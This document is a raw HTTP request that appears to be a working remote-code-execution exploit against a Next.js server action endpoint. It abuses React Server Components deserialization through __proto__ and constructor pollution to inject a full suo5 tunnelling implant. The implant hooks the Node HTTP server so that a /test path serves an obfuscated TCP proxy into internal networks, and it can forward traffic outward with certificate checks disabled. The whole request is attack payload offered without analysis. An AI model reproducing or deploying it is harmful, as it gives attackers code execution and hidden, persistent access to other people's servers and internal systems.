POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 30280

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"if (!global.__suo5_loaded) {\nconst reqFn = process.mainModule ? process.mainModule.require : require;\nconst http = reqFn('http');\nconst https = reqFn('https');\nconst net = reqFn('net');\nconst os = reqFn('os');\n\nconst ctx = new Map();\nconst addrs = collectAddr();\nconst CHARACTERS = 'abcdefghijklmnopqrstuvwxyz0123456789';\nconst MAX_FRAME_SIZE = 32 * 1024 * 1024;\nconst MAX_READ_SIZE = 512 * 1024;\nconst MAX_QUEUE_SIZE = 8 * 1024 * 1024;\nconst TUNNEL_IDLE_TIMEOUT_MS = 300 * 1000;\nconst SESSION_IDLE_TIMEOUT_MS = 300 * 1000;\n\nconst cleanupTimer = setInterval(cleanupIdleState, 30 * 1000);\nif (cleanupTimer.unref) cleanupTimer.unref();\n\n\nasync function processRequest(req, res) {\n    const reader = new StreamReader(req);\n    let dataMap;\n    try {\n        dataMap = await unmarshalBase64(reader);\n    } catch (_) {\n        if (!res.writableEnded) res.end();\n        return;\n    }\n\n    if (!isValidFrame(dataMap, true)) {\n        res.end();\n        return;\n    }\n\n    let sidData = dataMap.get('sid');\n    let sid = sidData ? sidData.toString() : null;\n    let tunId = dataMap.get('id').toString();\n    const mode = dataMap.get('m')[0];\n\n    switch (mode) {\n        case 0x00:\n            sid = randomString(16);\n            await processHandshake(req, res, dataMap, tunId, sid);\n            return;\n        case 0x01:\n            setBypassHeader(res);\n            await processFullStream(req, reader, res, dataMap, tunId);\n            return;\n        case 0x02:\n            setBypassHeader(res);\n            // fall through\n        case 0x03:\n            if (await handleRedirect(req, res, dataMap, reader)) return;\n            const session = sid ? getSession(sid) : null;\n            if (!session) {\n                res.writeHead(403);\n                res.end();\n                return;\n            }\n            touch(session);\n            if (mode === 0x02) {\n                await processHalfRequest(req, reader, res, dataMap, tunId, session);\n            } else {\n                await processClassicRequest(req, reader, res, dataMap, tunId, session);\n            }\n            return;\n        default:\n            res.end();\n    }\n}\n\nasync function processHandshake(req, res, dataMap, tunId, sid) {\n    const redirectData = dataMap.get('r');\n    if (redirectData && redirectData.length > 0 && !isLocalAddr(redirectData.toString())) {\n        res.writeHead(403);\n        res.end();\n        return;\n    }\n\n    const tplData = dataMap.get('tpl');\n    const ctData = dataMap.get('ct');\n    const parts = tplData && ctData ? tplData.toString().split('#data#') : ['', ''];\n    const jkData = dataMap.get('jk');\n    const dirtySize = jkData ? Math.max(0, parseInt(jkData.toString(), 10) || 0) : 0;\n    const session = {\n        kind: 'session',\n        ct: ctData ? ctData.toString() : '',\n        start: parts[0] || '',\n        end: parts[1] || '',\n        dirtySize,\n        lastActivity: Date.now()\n    };\n    ctx.set(sid, session);\n\n    const isAutoData = dataMap.get('a');\n    const isAuto = isAutoData && isAutoData[0] === 0x01;\n    if (isAuto) {\n        setBypassHeader(res);\n        await writeAndFlush(res, processTemplateStart(res, session), 0);\n        await writeAndFlush(res, marshalBase64(newData(tunId, dataMap.get('dt'))), 0);\n        await delay(2000);\n        await writeAndFlush(res, marshalBase64(newData(tunId, Buffer.from(sid))), 0);\n        await writeAndFlush(res, processTemplateEnd(session), 0);\n        res.end();\n        return;\n    }\n\n    const body = Buffer.concat([\n        processTemplateStart(res, session),\n        marshalBase64(newData(tunId, dataMap.get('dt'))),\n        marshalBase64(newData(tunId, Buffer.from(sid))),\n        processTemplateEnd(session)\n    ]);\n    res.setHeader('Content-Length', body.length);\n    await writeAndFlush(res, body, 0);\n    res.end();\n}\n\nasync function processFullStream(req, reader, res, dataMap, tunId) {\n    const target = getTarget(req, dataMap);\n    const socket = new net.Socket();\n    let responseWrites = Promise.resolve();\n    let outputDone = false;\n    let idleTimer = null;\n\n    const resetIdleTimer = () => {\n        clearTimeout(idleTimer);\n        idleTimer = setTimeout(() => socket.destroy(new Error('tunnel idle timeout')), TUNNEL_IDLE_TIMEOUT_MS);\n        if (idleTimer.unref) idleTimer.unref();\n    };\n    const abort = () => socket.destroy();\n    const onResponseClose = () => {\n        if (!res.writableEnded) abort();\n    };\n    req.once('aborted', abort);\n    req.once('error', abort);\n    res.once('close', onResponseClose);\n    socket.on('error', () => {});\n\n    try {\n        await connectSocket(socket, target.host, target.port, 5000);\n        resetIdleTimer();\n        await writeAndFlush(res, marshalBase64(newStatus(tunId, 0x00)), 0);\n    } catch (_) {\n        await safeWrite(res, marshalBase64(newStatus(tunId, 0x01)), 0);\n        if (!res.writableEnded) res.end();\n        socket.destroy();\n        clearTimeout(idleTimer);\n        removeAbortListeners();\n        return;\n    }\n\n    const inputTask = (async () => {\n        try {\n            while (true) {\n                const frame = await unmarshalBase64(reader);\n                if (!isValidFrame(frame, false)) break;\n                const action = frame.get('ac')[0];\n                resetIdleTimer();\n                if (action === 0x01) {\n                    const data = frame.get('dt');\n                    if (data && data.length) await writeSocket(socket, data);\n                } else if (action === 0x02) {\n                    break;\n                } else if (action === 0x10) {\n                    responseWrites = responseWrites.then(() => writeAndFlush(res, marshalBase64(newHeartbeat(tunId)), 0));\n                    await responseWrites;\n                }\n            }\n        } catch (_) {\n            // EOF and client abort both terminate the target side.\n        } finally {\n            if (!outputDone) socket.destroy();\n        }\n    })();\n\n    socket.on('data', chunk => {\n        socket.pause();\n        resetIdleTimer();\n        responseWrites = responseWrites\n            .then(() => writeAndFlush(res, marshalBase64(newData(tunId, chunk)), 0))\n            .then(() => {\n                if (!socket.destroyed) socket.resume();\n            })\n            .catch(abort);\n    });\n\n    await onceSocketClosed(socket);\n    outputDone = true;\n    reader.cancel();\n    await inputTask.catch(() => {});\n    await responseWrites.catch(() => {});\n    await safeWrite(res, marshalBase64(newDel(tunId)), 0);\n    if (!res.writableEnded && !res.destroyed) res.end();\n    clearTimeout(idleTimer);\n    removeAbortListeners();\n\n    function removeAbortListeners() {\n        req.removeListener('aborted', abort);\n        req.removeListener('error', abort);\n        res.removeListener('close', onResponseClose);\n    }\n}\n\nasync function processHalfRequest(req, reader, res, firstFrame, firstTunId, session) {\n    await writeAndFlush(res, processTemplateStart(res, session), session.dirtySize);\n    let frame = firstFrame;\n    let tunId = firstTunId;\n    while (true) {\n        await processHalfFrame(req, res, frame, tunId, session.dirtySize);\n        try {\n            frame = await unmarshalBase64(reader);\n            if (!isValidFrame(frame, false)) break;\n            tunId = frame.get('id').toString();\n        } catch (_) {\n            break;\n        }\n    }\n    await safeWrite(res, processTemplateEnd(session), session.dirtySize);\n    if (!res.writableEnded && !res.destroyed) res.end();\n}\n\nasync function processHalfFrame(req, res, dataMap, tunId, dirtySize) {\n    const action = dataMap.get('ac')[0];\n    try {\n        if (action === 0x00) {\n            // A retry needs a fresh response owner. Never leave the old target socket orphaned.\n            const old = getTunnel(tunId);\n            if (old) performDelete(tunId, old);\n            const createData = await performCreate(req, dataMap, tunId, true);\n            await writeAndFlush(res, createData, dirtySize);\n            const tunnel = getTunnel(tunId);\n            if (!tunnel || !tunnel.isOpen) throw new Error('tunnel not found');\n            await streamHalfTunnel(res, tunId, tunnel, dirtySize);\n        } else if (action === 0x01) {\n            await performWrite(dataMap, tunId);\n        } else if (action === 0x02) {\n            performDelete(tunId);\n        } else if (action === 0x10) {\n            const tunnel = getTunnel(tunId);\n            if (tunnel) touch(tunnel);\n            await writeAndFlush(res, marshalBase64(newHeartbeat(tunId)), dirtySize);\n        }\n    } catch (_) {\n        performDelete(tunId);\n        await safeWrite(res, marshalBase64(newDel(tunId)), dirtySize);\n    }\n}\n\nasync function streamHalfTunnel(res, tunId, tunnel, dirtySize) {\n    let writeChain = Promise.resolve();\n    let finished = false;\n    const abort = () => {\n        if (!finished) performDelete(tunId, tunnel);\n    };\n    res.once('close', abort);\n    tunnel.socket.on('data', chunk => {\n        tunnel.socket.pause();\n        touch(tunnel);\n        writeChain = writeChain\n            .then(() => writeAndFlush(res, marshalBase64(newData(tunId, chunk)), dirtySize))\n            .then(() => {\n                if (!tunnel.socket.destroyed) tunnel.socket.resume();\n            })\n            .catch(abort);\n    });\n    await onceSocketClosed(tunnel.socket);\n    await writeChain.catch(() => {});\n    finished = true;\n    res.removeListener('close', abort);\n    performDelete(tunId, tunnel);\n    await safeWrite(res, marshalBase64(newDel(tunId)), dirtySize);\n}\n\nasync function processClassicRequest(req, reader, res, firstFrame, firstTunId, session) {\n    const buffers = [processTemplateStart(res, session)];\n    let frame = firstFrame;\n    let tunId = firstTunId;\n    while (true) {\n        const data = await processClassicFrame(req, frame, tunId);\n        if (data && data.length) buffers.push(data);\n        try {\n            frame = await unmarshalBase64(reader);\n            if (!isValidFrame(frame, false)) break;\n            tunId = frame.get('id').toString();\n        } catch (_) {\n            break;\n        }\n    }\n    buffers.push(processTemplateEnd(session));\n    const body = Buffer.concat(buffers);\n    res.setHeader('Content-Length', body.length);\n    await writeAndFlush(res, body, 0);\n    res.end();\n}\n\nasync function processClassicFrame(req, dataMap, tunId) {\n    const action = dataMap.get('ac')[0];\n    try {\n        if (action === 0x00) return await performCreate(req, dataMap, tunId, false);\n        if (action === 0x01) {\n            await performWrite(dataMap, tunId);\n            return performRead(tunId);\n        }\n        if (action === 0x02) performDelete(tunId);\n    } catch (_) {\n        performDelete(tunId);\n        return marshalBase64(newDel(tunId));\n    }\n    return Buffer.alloc(0);\n}\n\nasync function performCreate(req, dataMap, tunId, isHalfStream) {\n    let existing = getTunnel(tunId);\n    if (existing) {\n        touch(existing);\n        await existing.ready.catch(() => {});\n        return marshalBase64(newStatus(tunId, existing.isOpen ? 0x00 : 0x01));\n    }\n\n    const target = getTarget(req, dataMap);\n    const socket = new net.Socket();\n    const tunnel = {\n        kind: 'tunnel', socket, isOpen: false, readQueue: [], readBytes: 0,\n        writeChain: Promise.resolve(), lastActivity: Date.now(), ready: null\n    };\n    ctx.set(tunId, tunnel);\n    socket.on('error', () => {\n        tunnel.isOpen = false;\n    });\n    socket.on('close', () => {\n        tunnel.isOpen = false;\n        notifyTunnel(tunnel);\n    });\n    if (!isHalfStream) {\n        socket.on('data', chunk => enqueueClassicData(tunnel, chunk));\n    }\n\n    tunnel.ready = connectSocket(socket, target.host, target.port, 3000)\n        .then(() => {\n            tunnel.isOpen = true;\n            touch(tunnel);\n        })\n        .catch(err => {\n            removeIfSame(tunId, tunnel);\n            socket.destroy();\n            throw err;\n        });\n    try {\n        await tunnel.ready;\n        return marshalBase64(newStatus(tunId, 0x00));\n    } catch (_) {\n        return marshalBase64(newStatus(tunId, 0x01));\n    }\n}\n\nasync function performWrite(dataMap, tunId) {\n    const tunnel = getTunnel(tunId);\n    if (!tunnel || !tunnel.isOpen) return;\n    const data = dataMap.get('dt');\n    if (!data || !data.length) return;\n    touch(tunnel);\n    const operation = tunnel.writeChain.then(() => writeSocket(tunnel.socket, data));\n    tunnel.writeChain = operation.catch(() => {});\n    await operation;\n}\n\nfunction performRead(tunId) {\n    const tunnel = getTunnel(tunId);\n    if (!tunnel) throw new Error('tunnel not found');\n    touch(tunnel);\n    let written = 0;\n    const buffers = [];\n    while (tunnel.readQueue.length) {\n        const chunk = tunnel.readQueue.shift();\n        tunnel.readBytes -= chunk.length;\n        written += chunk.length;\n        buffers.push(marshalBase64(newData(tunId, chunk)));\n        if (written >= MAX_READ_SIZE) break;\n    }\n    if (tunnel.socket.isPaused() && tunnel.readBytes < MAX_QUEUE_SIZE / 2 && tunnel.isOpen) {\n        tunnel.socket.resume();\n    }\n    if (!tunnel.isOpen && tunnel.readQueue.length === 0) {\n        performDelete(tunId, tunnel);\n        buffers.push(marshalBase64(newDel(tunId)));\n    }\n    return Buffer.concat(buffers);\n}\n\nfunction enqueueClassicData(tunnel, chunk) {\n    if (!chunk.length) return;\n    tunnel.readQueue.push(chunk);\n    tunnel.readBytes += chunk.length;\n    touch(tunnel);\n    if (tunnel.readBytes >= MAX_QUEUE_SIZE) tunnel.socket.pause();\n    notifyTunnel(tunnel);\n}\n\nfunction performDelete(tunId, expected) {\n    const tunnel = getTunnel(tunId);\n    if (!tunnel || (expected && tunnel !== expected)) return;\n    removeIfSame(tunId, tunnel);\n    tunnel.isOpen = false;\n    tunnel.socket.destroy();\n    notifyTunnel(tunnel);\n}\n\nfunction getTunnel(tunId) {\n    const value = ctx.get(tunId);\n    return value && value.kind === 'tunnel' ? value : null;\n}\n\nfunction getSession(sid) {\n    const value = ctx.get(sid);\n    return value && value.kind === 'session' ? value : null;\n}\n\nfunction removeIfSame(key, expected) {\n    if (ctx.get(key) === expected) ctx.delete(key);\n}\n\nfunction touch(value) {\n    value.lastActivity = Date.now();\n}\n\nfunction cleanupIdleState() {\n    const now = Date.now();\n    for (const [key, value] of ctx) {\n        const timeout = value.kind === 'tunnel' ? TUNNEL_IDLE_TIMEOUT_MS : SESSION_IDLE_TIMEOUT_MS;\n        if (now - value.lastActivity < timeout) continue;\n        if (value.kind === 'tunnel') performDelete(key, value);\n        else removeIfSame(key, value);\n    }\n}\n\nfunction closeAll() {\n    clearInterval(cleanupTimer);\n    for (const [key, value] of ctx) {\n        if (value.kind === 'tunnel') performDelete(key, value);\n        else ctx.delete(key);\n    }\n}\n\nfunction notifyTunnel(tunnel) {\n    if (!tunnel.waiters) return;\n    for (const resolve of tunnel.waiters) resolve();\n    tunnel.waiters.clear();\n}\n\nasync function unmarshalBase64(reader) {\n    const headerBase64 = await reader.read(8);\n    const header = b64urlDecode(headerBase64.toString());\n    if (header.length !== 6) throw new Error('invalid header');\n    const xor = Buffer.from([header[0], header[1]]);\n    for (let i = 2; i < 6; i++) header[i] ^= xor[i % 2];\n    const len = header.readUInt32BE(2);\n    if (len > MAX_FRAME_SIZE) throw new Error('invalid len');\n    const encoded = await reader.read(len);\n    const body = b64urlDecode(encoded.toString());\n    for (let i = 0; i < body.length; i++) body[i] ^= xor[i % 2];\n\n    const result = new Map();\n    let offset = 0;\n    while (offset < body.length) {\n        if (offset + 1 > body.length) throw new Error('invalid key len');\n        const keyLen = body[offset++];\n        if (offset + keyLen + 4 > body.length) throw new Error('invalid key');\n        const key = body.subarray(offset, offset + keyLen).toString('utf8');\n        offset += keyLen;\n        const valueLen = body.readUInt32BE(offset);\n        offset += 4;\n        if (offset + valueLen > body.length) throw new Error('invalid value');\n        result.set(key, body.subarray(offset, offset + valueLen));\n        offset += valueLen;\n    }\n    return result;\n}\n\nfunction marshalBase64(dataMap) {\n    const entries = new Map(dataMap);\n    const junkSize = Math.floor(Math.random() * 32);\n    if (junkSize) {\n        const junk = Buffer.allocUnsafe(junkSize);\n        for (let i = 0; i < junkSize; i++) junk[i] = Math.floor(Math.random() * 256);\n        entries.set('_', junk);\n    }\n    const buffers = [];\n    for (const [key, value] of entries) {\n        const keyBuffer = Buffer.from(key, 'utf8');\n        if (keyBuffer.length > 255) throw new Error('key too long');\n        const head = Buffer.alloc(1 + keyBuffer.length + 4);\n        head[0] = keyBuffer.length;\n        keyBuffer.copy(head, 1);\n        head.writeUInt32BE(value.length, 1 + keyBuffer.length);\n        buffers.push(head, value);\n    }\n    const body = Buffer.concat(buffers);\n    const xor = Buffer.from([randomByte(), randomByte()]);\n    for (let i = 0; i < body.length; i++) body[i] ^= xor[i % 2];\n    const encoded = Buffer.from(b64urlEncode(body), 'utf8');\n    const header = Buffer.alloc(6);\n    xor.copy(header);\n    header.writeUInt32BE(encoded.length, 2);\n    for (let i = 2; i < 6; i++) header[i] ^= xor[i % 2];\n    return Buffer.concat([Buffer.from(b64urlEncode(header), 'utf8'), encoded]);\n}\n\nclass StreamReader {\n    constructor(stream) {\n        this.stream = stream;\n        this.buffer = Buffer.alloc(0);\n        this.waiters = [];\n        this.ended = false;\n        this.error = null;\n        this.onData = chunk => {\n            if (this.buffer.length + chunk.length > MAX_FRAME_SIZE + 8) {\n                this.finish(new Error('request buffer limit exceeded'));\n                stream.destroy();\n                return;\n            }\n            this.buffer = Buffer.concat([this.buffer, chunk]);\n            this.check();\n        };\n        this.onEnd = () => this.finish(new Error('EOF'));\n        this.onAborted = () => this.finish(new Error('request aborted'));\n        this.onError = err => this.finish(err);\n        stream.on('data', this.onData);\n        stream.once('end', this.onEnd);\n        stream.once('aborted', this.onAborted);\n        stream.once('error', this.onError);\n    }\n\n    read(len) {\n        if (!Number.isSafeInteger(len) || len < 0 || len > MAX_FRAME_SIZE) {\n            return Promise.reject(new Error('invalid read length'));\n        }\n        if (this.buffer.length >= len) return Promise.resolve(this.take(len));\n        if (this.ended) return Promise.reject(this.error || new Error('EOF'));\n        return new Promise((resolve, reject) => {\n            this.waiters.push({ len, resolve, reject });\n            this.check();\n        });\n    }\n\n    take(len) {\n        const result = this.buffer.subarray(0, len);\n        this.buffer = this.buffer.subarray(len);\n        return result;\n    }\n\n    check() {\n        while (this.waiters.length && this.buffer.length >= this.waiters[0].len) {\n            const waiter = this.waiters.shift();\n            waiter.resolve(this.take(waiter.len));\n        }\n        if (this.ended) {\n            while (this.waiters.length) this.waiters.shift().reject(this.error || new Error('EOF'));\n        }\n    }\n\n    finish(err) {\n        if (this.ended) return;\n        this.ended = true;\n        this.error = err;\n        this.check();\n    }\n\n    async readRemaining() {\n        if (!this.ended) {\n            await new Promise((resolve, reject) => {\n                const done = () => {\n                    this.stream.removeListener('error', failed);\n                    resolve();\n                };\n                const failed = err => {\n                    this.stream.removeListener('end', done);\n                    reject(err);\n                };\n                this.stream.once('end', done);\n                this.stream.once('error', failed);\n            });\n        }\n        const result = this.buffer;\n        this.buffer = Buffer.alloc(0);\n        return result;\n    }\n\n    cancel() {\n        this.finish(new Error('reader cancelled'));\n        this.stream.removeListener('data', this.onData);\n        this.stream.removeListener('end', this.onEnd);\n        this.stream.removeListener('aborted', this.onAborted);\n        this.stream.removeListener('error', this.onError);\n    }\n}\n\nasync function writeAndFlush(res, data, dirtySize) {\n    if (!data || !data.length) return;\n    await writeResponse(res, data);\n    if (dirtySize > 0) await writeResponse(res, marshalBase64(newDirtyChunk(dirtySize)));\n}\n\nasync function safeWrite(res, data, dirtySize) {\n    try {\n        await writeAndFlush(res, data, dirtySize);\n    } catch (_) {}\n}\n\nfunction writeResponse(res, data) {\n    if (res.destroyed || res.writableEnded) return Promise.reject(new Error('response closed'));\n    if (res.write(data)) return Promise.resolve();\n    return new Promise((resolve, reject) => {\n        const cleanup = () => {\n            res.removeListener('drain', onDrain);\n            res.removeListener('error', onError);\n            res.removeListener('close', onClose);\n        };\n        const onDrain = () => { cleanup(); resolve(); };\n        const onError = err => { cleanup(); reject(err); };\n        const onClose = () => { cleanup(); reject(new Error('response closed')); };\n        res.once('drain', onDrain);\n        res.once('error', onError);\n        res.once('close', onClose);\n    });\n}\n\nfunction writeSocket(socket, data) {\n    if (socket.destroyed || !socket.writable) return Promise.reject(new Error('socket closed'));\n    if (socket.write(data)) return Promise.resolve();\n    return new Promise((resolve, reject) => {\n        const cleanup = () => {\n            socket.removeListener('drain', onDrain);\n            socket.removeListener('error', onError);\n            socket.removeListener('close', onClose);\n        };\n        const onDrain = () => { cleanup(); resolve(); };\n        const onError = err => { cleanup(); reject(err); };\n        const onClose = () => { cleanup(); reject(new Error('socket closed')); };\n        socket.once('drain', onDrain);\n        socket.once('error', onError);\n        socket.once('close', onClose);\n    });\n}\n\nasync function handleRedirect(req, res, dataMap, reader) {\n    const redirectData = dataMap.get('r');\n    if (!redirectData || !redirectData.length || isLocalAddr(redirectData.toString())) return false;\n    let target;\n    try {\n        target = new URL(redirectData.toString());\n        if (target.protocol !== 'http:' && target.protocol !== 'https:') throw new Error('invalid protocol');\n    } catch (_) {\n        return false;\n    }\n\n    dataMap.delete('r');\n    const body = Buffer.concat([marshalBase64(dataMap), await reader.readRemaining()]);\n    const headers = Object.assign({}, req.headers, {\n        host: target.host,\n        connection: 'close',\n        'content-length': body.length\n    });\n    delete headers['content-encoding'];\n    delete headers['transfer-encoding'];\n    const client = target.protocol === 'https:' ? https : http;\n\n    await new Promise(resolve => {\n        const proxyReq = client.request(target, {\n            method: req.method,\n            headers,\n            rejectUnauthorized: false\n        }, proxyRes => {\n            res.writeHead(proxyRes.statusCode || 502, proxyRes.headers);\n            proxyRes.pipe(res);\n            proxyRes.once('end', resolve);\n            proxyRes.once('error', () => {\n                if (!res.writableEnded) res.end();\n                resolve();\n            });\n        });\n        const timer = setTimeout(() => proxyReq.destroy(new Error('redirect timeout')), 3000);\n        const done = () => clearTimeout(timer);\n        proxyReq.once('close', done);\n        proxyReq.once('error', () => {\n            if (!res.headersSent) res.writeHead(502);\n            if (!res.writableEnded) res.end();\n            resolve();\n        });\n        res.once('close', () => proxyReq.destroy());\n        proxyReq.end(body);\n    });\n    return true;\n}\n\nfunction connectSocket(socket, host, port, timeout) {\n    return new Promise((resolve, reject) => {\n        let settled = false;\n        const finish = err => {\n            if (settled) return;\n            settled = true;\n            socket.setTimeout(0);\n            socket.removeListener('connect', onConnect);\n            socket.removeListener('error', onError);\n            socket.removeListener('timeout', onTimeout);\n            if (err) reject(err); else resolve();\n        };\n        const onConnect = () => finish();\n        const onError = err => finish(err);\n        const onTimeout = () => finish(new Error('connect timeout'));\n        socket.setNoDelay(true);\n        socket.setTimeout(timeout);\n        socket.once('connect', onConnect);\n        socket.once('error', onError);\n        socket.once('timeout', onTimeout);\n        socket.connect(port, host);\n    });\n}\n\nfunction onceSocketClosed(socket) {\n    if (socket.destroyed) return Promise.resolve();\n    return new Promise(resolve => socket.once('close', resolve));\n}\n\nfunction getTarget(req, dataMap) {\n    const hostData = dataMap.get('h');\n    const portData = dataMap.get('p');\n    if (!hostData || !portData) throw new Error('missing target');\n    const host = hostData.toString();\n    let port = parseInt(portData.toString(), 10);\n    if (port === 0) port = req.socket.localPort;\n    if (!host || !Number.isInteger(port) || port < 1 || port > 65535) throw new Error('invalid target');\n    return { host, port };\n}\n\nfunction isValidFrame(dataMap, requireMode) {\n    if (!dataMap || !(dataMap instanceof Map)) return false;\n    const action = dataMap.get('ac');\n    const id = dataMap.get('id');\n    const mode = dataMap.get('m');\n    return !!(action && action.length === 1 && id && id.length && (!requireMode || (mode && mode.length)));\n}\n\nfunction processTemplateStart(res, session) {\n    if (session.ct) res.setHeader('Content-Type', session.ct);\n    return Buffer.from(session.start);\n}\n\nfunction processTemplateEnd(session) {\n    return Buffer.from(session.end);\n}\n\nfunction setBypassHeader(res) {\n    res.setHeader('X-Accel-Buffering', 'no');\n}\n\nfunction newStatus(tunId, status) {\n    return new Map([['ac', Buffer.from([0x03])], ['s', Buffer.from([status])], ['id', Buffer.from(tunId)]]);\n}\n\nfunction newData(tunId, data) {\n    return new Map([['ac', Buffer.from([0x01])], ['dt', Buffer.from(data || Buffer.alloc(0))], ['id', Buffer.from(tunId)]]);\n}\n\nfunction newDel(tunId) {\n    return new Map([['ac', Buffer.from([0x02])], ['id', Buffer.from(tunId)]]);\n}\n\nfunction newHeartbeat(tunId) {\n    return new Map([['ac', Buffer.from([0x10])], ['id', Buffer.from(tunId)]]);\n}\n\nfunction newDirtyChunk(size) {\n    const result = new Map([['ac', Buffer.from([0x11])]]);\n    if (size > 0) {\n        const junk = Buffer.allocUnsafe(size);\n        for (let i = 0; i < size; i++) junk[i] = Math.floor(Math.random() * 256);\n        result.set('d', junk);\n    }\n    return result;\n}\n\nfunction b64urlEncode(buf) {\n    return buf.toString('base64').replace(/\\+/g, '-').replace(/\\//g, '_').replace(/=/g, '');\n}\n\nfunction b64urlDecode(value) {\n    const pad = value.length % 4;\n    if (pad) value += '='.repeat(4 - pad);\n    return Buffer.from(value.replace(/-/g, '+').replace(/_/g, '/'), 'base64');\n}\n\nfunction randomByte() {\n    return Math.floor(Math.random() * 255) + 1;\n}\n\nfunction randomString(length) {\n    let value = '';\n    for (let i = 0; i < length; i++) value += CHARACTERS.charAt(Math.floor(Math.random() * CHARACTERS.length));\n    return value;\n}\n\nfunction collectAddr() {\n    const result = new Map();\n    try {\n        const interfaces = os.networkInterfaces();\n        for (const key in interfaces) {\n            for (const iface of interfaces[key]) {\n                if (iface.family === 'IPv4' || iface.family === 4 || iface.family === 'IPv6' || iface.family === 6) {\n                    result.set(iface.address.split('%')[0], true);\n                }\n            }\n        }\n    } catch (_) {}\n    return result;\n}\n\nfunction isLocalAddr(urlValue) {\n    try {\n        return addrs.has(new URL(urlValue).hostname);\n    } catch (_) {\n        return false;\n    }\n}\n\nfunction delay(ms) {\n    return new Promise(resolve => setTimeout(resolve, ms));\n}\n\nif (!http.Server.prototype.__suo5_patched) {\n    const originalEmit = http.Server.prototype.emit;\n    http.Server.prototype.emit = function (type, req, res) {\n        if (type === 'request' && req && typeof req.url === 'string' && req.url.split('?')[0] === '/test') {\n            processRequest(req, res).catch(() => {\n                if (!res.headersSent) res.writeHead(500);\n                if (!res.writableEnded) res.end();\n            });\n            return true;\n        }\n        return originalEmit.apply(this, arguments);\n    };\n    http.Server.prototype.__suo5_patched = true;\n}\n\nglobal.__suo5_loaded = true;\n}\nthrow Object.assign(new Error('NEXT_REDIRECT'), { digest: 'NEXT_REDIRECT;push;/login?a=suo5;307;' });","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
